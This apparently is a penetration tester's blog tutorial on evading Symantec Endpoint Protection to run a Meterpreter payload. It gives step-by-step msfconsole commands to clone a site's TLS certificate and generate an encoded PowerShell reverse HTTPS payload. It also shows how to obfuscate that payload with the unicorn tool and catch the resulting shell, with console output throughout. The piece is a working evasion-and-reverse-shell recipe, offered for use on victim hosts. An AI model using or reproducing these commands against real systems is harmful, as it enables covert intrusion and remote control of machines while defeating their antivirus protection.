Here is a simple method to bypass Symantec End Point AV from detecting Meterpreter. The technique is not unique and had been documented on other blogs. I take no credit for it but it is still worth its salt as I had some success using it during my engagements. This is really useful when you have gain a foothold on a victim host but you can't disable the AV because you don't have the password. Remember, most AV engines require additional password to disable it even though you already have SYSTEM privilege. So, the next best thing you can do is, try to bypass it. As long as you do not touch disk and execute code in mem, you could have a fair chance of evading but the HIPS (Host IPS) might be a pain, so I found this technique documented
here. The difference is I used unicorn to further obfuscate the payload in ps1 format.
1. Firstly, the AV will most certainly catch the default certificate used by msf. To get around it, generate a fake certificate using msfconsole.
> set rhosts www.google.com
rhosts => www.google.com
msf5 auxiliary(gather/impersonate_ssl) > run
[*] Running module against 172.217.166.132
[*] 172.217.166.132:443 - Connecting to 172.217.166.132:443
[*] 172.217.166.132:443 - Copying certificate from 172.217.166.132:443
/OU=No SNI provided; please fix your client./CN=invalid2.invalid
[*] 172.217.166.132:443 - Beginning export of certificate files
[*] 172.217.166.132:443 - Creating looted key/crt/pem files for 172.217.166.132:443
[+] 172.217.166.132:443 - key: /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__624209.key
[+] 172.217.166.132:443 - crt: /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__236829.crt
[+] 172.217.166.132:443 - pem: /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__976059.pem
[*] Running module against 2404:6800:4001:80f::2004
[*] 2404:6800:4001:80f::2004:443 - Connecting to 2404:6800:4001:80f::2004:443
[-] 2404:6800:4001:80f::2004:443 - 2404:6800:4001:80f::2004:443 No certificate subject or CN found
[*] Auxiliary module execution completed
2. Now, generate its payload, I use reverse HTTPS with the fake cert.
msf5 auxiliary(gather/impersonate_ssl) > use payload/windows/meterpreter/reverse_https
msf5 payload(windows/meterpreter/reverse_https) > show options
Module options (payload/windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.8.103 yes The local listener hostname
LPORT 443 yes The local listener port
LURI no The HTTP Path
msf5 payload(windows/meterpreter/reverse_https) > set handlersslcert /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__976059.pem
handlersslcert => /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__976059.pem
msf5 payload(windows/meterpreter/reverse_https) > set stagerverifysslcert true
stagerverifysslcert => true
msf5 payload(windows/meterpreter/reverse_https) > generate -f psh-cmd
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAG <SNIP SNIP> ByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==msf5 payload(windows/meterpreter/reverse_https) > generate -f psh-cmd -o /tmp/works.txt
[*] Writing 7359 bytes to /tmp/works.txt...
3. Use unicorn to obfuscate /tmp/works.txt, you can remove "%COMSPEC% /b /c start /b /min " before exec unicorn.
# python unicorn.py /tmp/works.ps1
,/
//
,//
___ /| |//
`__/\_ --(/|___/-/
\|\_-\___ __-_`- /-/ \.
|\_-___,-\_____--/_)' ) \
\ -_ / __ \( `( __`\|
`\__| |\)\ ) /(/|
,._____., ',--//-| \ | ' /
/ __. \, / /,---| \ /
/ / _. \ \ `/`_/ _,' | |
| | ( ( \ | ,/\'__/'/ | |
| \ \`--, `_/_------______/ \( )/
| | \ \_. \, \___/\
| | \_ \ \ \
\ \ \_ \ \ / \
\ \ \._ \__ \_| | \
\ \___ \ \ | \
\__ \__ \ \_ | \ |
| \_____ \ ____ | |
| \ \__ ---' .__\ | | |
\ \__ --- / ) | \ /
\ \____/ / ()( \ `---_ /|
\__________/(,--__ \_________. | ./ |
| \ \ `---_\--, \ \_,./ |
| \ \_ ` \ /`---_______-\ \\ /
\ \.___,`| / \ \\ \
\ | \_ \| \ ( |: |
\ \ \ | / / | ;
\ \ \ \ ( `_' \ |
\. \ \. \ `__/ | |
\ \ \. \ | |
\ \ \ \ ( )
\ | \ | | |
| \ \ \ I `
( __; ( _; ('-_';
|___\ \___: \___:
aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Happy Magic Unicorns.
[*******************************************************************************************************]
-----Custom PS1 Attack Instructions----
This attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro.
Note if choosing the macro option, a large ps1 file may exceed the amount of carriage returns allowed by
VBA. You may change the number of characters in each VBA string by passing an integer as a parameter.
Examples:
python unicorn.py harmless.ps1
python unicorn.py myfile.ps1 macro
python unicorn.py muahahaha.ps1 macro 500
The last one will use a 500 character string instead of the default 380, resulting in less carriage returns in VBA.
[*******************************************************************************************************]
[*] Exported powershell output code to powershell_attack.txt
3a. The obfuscated output is now in powershell_attack.txt which can be used on he victim host with AV.
# cat /home/gr00t/Downloads/unicorn/powershell_attack.txt
powershell /w 1 /C "s''v Ls -;s''v Ew e''c;s''v ixN ((g''v Ls).value.toString()+(g''v Ew).value.toString());powershell (g''v ixN).value.toString() ('cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlACAAYQBRAEIAbQBBAEMAZwBBAFcAdwBCAEoAQQBHADQAQQBkAEEAQgBRAEEASABRAEEAYwBnAEIAZAB <SNIP SNIP> wBCADEAQQBFAGsAQQBWAGcAQgB4AEEASABvAEEAYQB3AEIAcgBBAEcARQBBAGEBAEgAQQBBAFAAUQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFIAQQBCAHAAQQBHAEUAQQBaAHcAQgB1AEEARwA4AEEAYwB3AEIAMABBAEcAawBBAFkAdwBCAHoAQQBDADQAQQBVAEEAQgB5AEEARwA4AEEAWQB3AEIAbABBAEgATQBBAGMAdwBCAGQAQQBEAG8AQQBPAGcAQgBUAEEASABRAEEAWQBRAEIAeQBBAEgAUQBBAEsAQQBBAGsAQQBIAE0AQQBLAFEAQQA3AEEAQQA9AD0ACgA=')"
3b. Now, you can use msfconsole to catch the reverse https shell, execute powershell_attack on victim host after modifying the keywords vAlue.ToString() to avoid AV detection
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.8.106 yes The local listener hostname
LPORT 443 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 Wildcard Target
meterpreter > exploit
[*] Started HTTPS reverse handler on https://192.168.8.106:443
[*] https://192.168.8.106:443 handling request from 192.168.8.104; (UUID: qbdxxru2) Meterpreter will verify SSL Certificate with SHA1 hash e27a4b10aeea1b1e22a1ee86d9a6d7f0584d08e9
[*] https://192.168.8.106:443 handling request from 192.168.8.104; (UUID: qbdxxru2) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 4 opened (192.168.8.106:443 -> 192.168.8.104:50302) at 2019-03-19 17:08:05 +0800
meterpreter > sysinfo
Computer : DESKTOP-O7UQ1HA
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
4. On the victim host, you'll notice that the AV did not trigger.
